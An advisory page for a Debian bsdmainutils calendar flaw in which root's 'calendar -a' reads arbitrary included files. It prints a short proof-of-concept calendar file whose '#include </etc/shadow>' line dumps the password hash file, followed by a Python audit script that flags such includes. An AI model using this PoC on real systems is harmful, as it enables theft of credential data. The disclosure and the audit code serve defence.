
Debian bsdmainutils 6.0.14 - Calendar Information Disclosure

31 Aug 2004 00:00:00 | Reported by Steven Van Acker | Type: exploitdb | Source: www.exploit-db.com

Debian bsdmainutils is vulnerable to information disclosure via the calendar utility; versions prior to 6.0.15 are affected.

Code
// source: https://www.securityfocus.com/bid/11077/info

The calendar utility contained in the bsdmainutils package on Debian GNU/Linux systems is reported susceptible to an information disclosure vulnerability. This is due to a lack of proper file authorization checks by the application.

The application fails to enforce permissions of included files when run as the superuser with the '-a' argument, therefore it is possible for a local attacker to create a calendar file that will disclose the contents of arbitrary, potentially sensitive files. This may aid them in further attacks against the affected computer.

By default, the package is installed with a crontab file that will not call the calendar utility. Systems are only affected if the crontab is enabled by administrators.

Debian GNU/Linux computers with bsdmainutils versions prior to 6.0.15 are reported to be vulnerable. 

#define root Jun. 28<tab>cut_here
#include </etc/shadow>
Jun. 28<tab>Birthday of Steven Van Acker
Aug. 19<tab>Birthday of Andrew Griffith

(where <tab> should be replaced by an actual Tab character) 
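
An audit sketch for the condition described above, added here as an example (not code from the advisory or from bsdmainutils): it lists `#include` directives in a user's calendar file and flags absolute targets that the file's owner could not read with their own permissions. The function names, the sample uid/gid values and the injectable `stat_fn` parameter are assumptions; the check covers classic mode bits only, not ACLs or directory traversal rights.

```python
import os
import re
import stat

# cpp-style include directive as used in calendar files: #include <path> or "path"
INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]')

# Constructed sample: the calendar file shown in the advisory, with real tabs.
SAMPLE = ("#define root Jun. 28\tcut_here\n"
          "#include </etc/shadow>\n"
          "Jun. 28\tBirthday of Steven Van Acker\n")

def find_includes(text):
    """Return (line_number, path) for each #include directive in a calendar file."""
    return [(n, m.group(1)) for n, line in enumerate(text.splitlines(), 1)
            if (m := INCLUDE_RE.match(line))]

def owner_may_read(mode, file_uid, file_gid, uid, gids):
    """Classic Unix mode-bit check: may `uid` (member of `gids`) read the file?"""
    if uid == 0:
        return True
    if uid == file_uid:
        return bool(mode & stat.S_IRUSR)
    if file_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)

def audit(text, calendar_uid, calendar_gids, stat_fn=os.stat):
    """Flag absolute includes that the calendar file's owner could not read."""
    findings = []
    for lineno, path in find_includes(text):
        if not path.startswith("/"):
            continue  # relative includes depend on calendar's search path; skipped
        try:
            st = stat_fn(path)
        except OSError:
            continue  # target missing or not stat-able: nothing to disclose
        if not owner_may_read(st.st_mode, st.st_uid, st.st_gid,
                              calendar_uid, calendar_gids):
            findings.append((lineno, path))
    return findings

if __name__ == "__main__":
    # Audits the sample as if it belonged to the invoking user.
    for lineno, path in audit(SAMPLE, os.getuid(), set(os.getgroups())):
        print(f"line {lineno}: include of {path} is not readable by the file owner")
```

On a host where the cron job runs `calendar -a`, the same check can be run over each user's calendar file with that user's uid and group set.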
